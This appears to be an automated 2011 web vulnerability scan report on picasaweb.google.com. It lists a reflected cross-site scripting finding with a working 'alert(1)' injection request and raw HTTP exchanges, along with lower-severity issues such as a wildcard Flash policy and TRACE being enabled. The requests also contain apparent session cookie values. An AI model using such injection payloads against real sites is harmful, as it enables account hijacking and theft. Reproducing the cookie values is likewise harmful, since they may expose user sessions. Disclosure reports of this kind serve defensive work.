XSS, picasaweb.google.com, Cross Site Scripting, Javascript

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Sat Mar 05 21:01:21 CST 2011.


The DORK Report

Loading

1. Cross-site scripting (reflected)

2. Flash cross-domain policy

3. Cookie scoped to parent domain

4. TRACE method is enabled

5. Robots.txt file



1. Cross-site scripting (reflected)  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://picasaweb.google.com
Path:   /data/feed/api/user/kennycarlile/albumid/5245720683775232113

Issue detail

The value of the kind request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 54546%3balert(1)//7aa94a199c9 was submitted in the kind parameter. This input was echoed as 54546;alert(1)//7aa94a199c9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

Request

GET /data/feed/api/user/kennycarlile/albumid/5245720683775232113?kind=photo54546%3balert(1)//7aa94a199c9&alt=rss HTTP/1.1
Host: picasaweb.google.com
Proxy-Connection: keep-alive
Referer: http://picasaweb.google.com/s/c/bin/slideshow.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=sorry=6N0zPerLQtZIDQDH-_qUMQ; GDSESS=ID=e1a16a9b7ce43f1c:EX=1299345465:S=ADSvE-cUtO3XgnQSw6g77AjY8znezaDTsA; NID=44=u2XW7LojnxksmroQ7tLOJH9iTdx0ZE4aJZEmpm79dDPuyRSgPEj_FPvzR_qlOMRWHUOw8qy4vEbL4IaHouYJFpHUibauoR4eQwQw207Tb3UvOzU5XoNP7tDP3nznjsVn; PREF=ID=b1572e52fc3cd4d5:U=846c862c779dbef7:FF=4:LD=en:CR=2:TM=1297804539:LM=1299334711:GM=1:SG=1:S=yYP0BOQvGyQXDqgs

Response

HTTP/1.1 400 Bad Request
Expires: Sat, 05 Mar 2011 14:40:02 GMT
Date: Sat, 05 Mar 2011 14:40:02 GMT
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _rtok=kBbE7Kz1nOis; Path=/; HttpOnly
Set-Cookie: S=sorry=6N0zPerLQtZIDQDH-_qUMQ:photos_html=ueAighsnDzpw0qI7dYvjKg; Domain=.google.com; Path=/; HttpOnly
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 66

Invalid value for kind parameter: photo54546;alert(1)//7aa94a199c9

2. Flash cross-domain policy  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://picasaweb.google.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

Request

GET /crossdomain.xml HTTP/1.0
Host: picasaweb.google.com

Response

HTTP/1.0 200 OK
Expires: Sun, 06 Mar 2011 14:35:50 GMT
Date: Sat, 05 Mar 2011 14:35:50 GMT
Cache-Control: public, max-age=86400
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.ru" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.co.th" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.bg" />
<allow-access-from domain="*.google.hr" />
<allow-access-from domain="*.google.cz" />
<allow-access-from domain="*.google.gr" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.hu" />
<allow-access-from domain="*.google.co.id" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.google.si" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.fr" />
...[SNIP]...

3. Cookie scoped to parent domain  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://picasaweb.google.com
Path:   /data/feed/api/user/kennycarlile/albumid/5245720683775232113

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

Request

GET /data/feed/api/user/kennycarlile/albumid/5245720683775232113?kind=photo&alt=rss HTTP/1.1
Host: picasaweb.google.com
Proxy-Connection: keep-alive
Referer: http://picasaweb.google.com/s/c/bin/slideshow.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=sorry=6N0zPerLQtZIDQDH-_qUMQ; GDSESS=ID=e1a16a9b7ce43f1c:EX=1299345465:S=ADSvE-cUtO3XgnQSw6g77AjY8znezaDTsA; NID=44=u2XW7LojnxksmroQ7tLOJH9iTdx0ZE4aJZEmpm79dDPuyRSgPEj_FPvzR_qlOMRWHUOw8qy4vEbL4IaHouYJFpHUibauoR4eQwQw207Tb3UvOzU5XoNP7tDP3nznjsVn; PREF=ID=b1572e52fc3cd4d5:U=846c862c779dbef7:FF=4:LD=en:CR=2:TM=1297804539:LM=1299334711:GM=1:SG=1:S=yYP0BOQvGyQXDqgs

Response

HTTP/1.1 200 OK
Expires: Sat, 05 Mar 2011 14:39:52 GMT
Date: Sat, 05 Mar 2011 14:39:52 GMT
Cache-Control: private, max-age=0, must-revalidate, no-transform
Set-Cookie: _rtok=KfyGPGMy2O9Q; Path=/; HttpOnly
Set-Cookie: S=sorry=6N0zPerLQtZIDQDH-_qUMQ:photos_html=5pMaii9PcloGrQjkNxh9pg; Domain=.google.com; Path=/; HttpOnly
Content-Type: application/rss+xml; charset=UTF-8
Vary: Accept, X-GData-Authorization, GData-Version, Cookie
GData-Version: 1.0
Last-Modified: Wed, 24 Jun 2009 20:06:29 GMT
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 73985

<?xml version='1.0' encoding='UTF-8'?><rss xmlns:exif='http://schemas.google.com/photos/exif/2007' xmlns:atom='http://www.w3.org/2005/Atom' xmlns:gphoto='http://schemas.google.com/photos/2007' xmlns:m
...[SNIP]...

4. TRACE method is enabled  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://picasaweb.google.com
Path:   /

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.

Request

TRACE / HTTP/1.0
Host: picasaweb.google.com
Cookie: 49a1fceff44b1a19

Response

HTTP/1.0 200 OK
Expires: Sat, 05 Mar 2011 14:35:50 GMT
Date: Sat, 05 Mar 2011 14:35:50 GMT
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _rtok=ehpYxI-cF8Rb; Path=/; HttpOnly
Set-Cookie: S=photos_html=jmm24VE6By_Hycp4sFkcPw; Domain=.google.com; Path=/; HttpOnly
Content-Type: message/http; charset=UTF-8
Content-Length: 468
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

TRACE /errors/405 HTTP/1.1
Host: picasaweb.google.com
Cookie: 49a1fceff44b1a19
X-Google-GFE-Frontline-Info: vip=72.14.204.190,server_port=80,client_port=3587,tcp_connection_request_count=0,header_order=HC,rtt=4,client_protocol=HTTP/1.0
X-Google-GFE-Can-Retry: yes
X-User-IP: 1
...[SNIP]...

5. Robots.txt file  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://picasaweb.google.com
Path:   /s/c/bin/slideshow.swf

Issue detail

The web server contains a robots.txt file.

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

Request

GET /robots.txt HTTP/1.0
Host: picasaweb.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Sat, 05 Mar 2011 14:35:50 GMT
Expires: Sat, 05 Mar 2011 14:35:50 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

User-agent: *
Allow: /lh/albumList
Allow: /lh/album
Allow: /lh/favorites
Allow: /lh/idredir
Allow: /lh/photo
Allow: /lh/sredir
Disallow: /lh/

Report generated by XSS.CX at Sat Mar 05 21:01:21 CST 2011.